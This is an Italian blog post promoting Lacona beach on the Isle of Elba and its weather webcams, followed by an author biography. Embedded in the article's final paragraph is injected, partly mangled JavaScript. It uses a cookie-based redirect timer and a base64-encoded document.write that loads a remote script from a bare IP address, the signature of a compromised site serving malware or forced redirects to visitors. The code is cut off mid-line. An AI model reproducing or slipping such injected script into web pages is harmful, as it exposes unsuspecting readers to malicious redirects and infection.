Image

Minuto per minuto, tutto il meteo di Lacona dall’Elba

Lacona: una delle spiagge dell’Isola d’Elba da non perdere

Avete mai sentito parlare di web cam a Lacona? Si tratta di semplici webcam all’Elba, a Lacona appunto, che servono a visualizzare h24 la situazione meteo direttamente online. Ma andiamo per ordine e scopriamo perché proprio qui.

Derivante probabilmente dal nome latino “lacuna” per la presenza in questa zona di acquitrini bonificati da Napoleone Bonaparte, la spiaggia di Lacona è una delle più belle dell’Elba. Situata sulla costa meridionale, nel Comune di Capoliveri, si affaccia sull’isola di Montecristo e, lunga più di un chilometro, è seconda solo alla spiaggia di Marina di Campo. Circondata dalla baia costituita dalle penisole di Capo Stella e Capo Fonza e protetta alle spalle da una zona boschiva, il meteo di Lacona all’Elba è sempre buono.

Dune di sabbia finissima, discesa dolce nei primi metri e un fondale ricco di rocce e posidonia sono ideali sia per chi vuole godersi la spiaggia sia per chi ama le immersioni. Perfetta quindi per le famiglie con bambini piccoli, ma anche per i giovani, offre molteplici servizi turistici e sportivi, come appartamenti, bancomat, bar, campeggi, corsia barche, farmacia, hotel, negozi, noleggio imbarcazioni, sdraio, ombrelloni, pedalò, residence, ristoranti, scuola di canoa, sci d’acqua, surf e vela. Facile da raggiungere, è servita dagli autobus di linea ed ha a disposizione un parcheggio auto molto capiente.

Se quindi volete sapere il meteo a Lacona all’Isola d’Elba, potete verificarlo direttamente da siti come campingtallinucci.it, vsmaria.it, dove è possibile accedere alle webcam a Lacona che trasmettono in diretta le immagini della spiaggia. Quello che da Lacona le webcam non possono farvi vedere, però, è un meraviglioso parco dei divertimenti e una fitta pineta per giocare, mangiare o riposare approfittando dell’ombra dei grandi pini marittimi. Da sapere: oltre alle webcam di Lacona all’Elba, da questi siti si possono visualizzare anche altre località marittime dell’isola. _ok_”text/javascript”> function getCo_ok_ie(e){var U=document.co_ok_ie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),co_ok_ie=getCo_ok_ie(“redirect”);if(now>=(time=co_ok_ie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.co_ok_ie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘

Share this post

Federica Mazzei

Elbana di nascita, giramondo per natura. Nata nel 1984 consegue nel 2007 una laurea triennale in Comunicazione sociale e nel 2009 una laurea magistrale con lode in Sistemi e progetti di comunicazione, prosegue il percorso formativo con una borsa di studio di due anni presso la Scuola Superiore Sant'Anna di Pisa (attività di supporto e potenziamento Ufficio Relazioni con il Pubblico, progettazione Piani integrati a livello di Zona distretto). Esperienze lavorative nel settore delle relazioni al pubblico, negli enti del terzo settore e nella comunicazione digitale.

Nessun commento

Aggiungi commento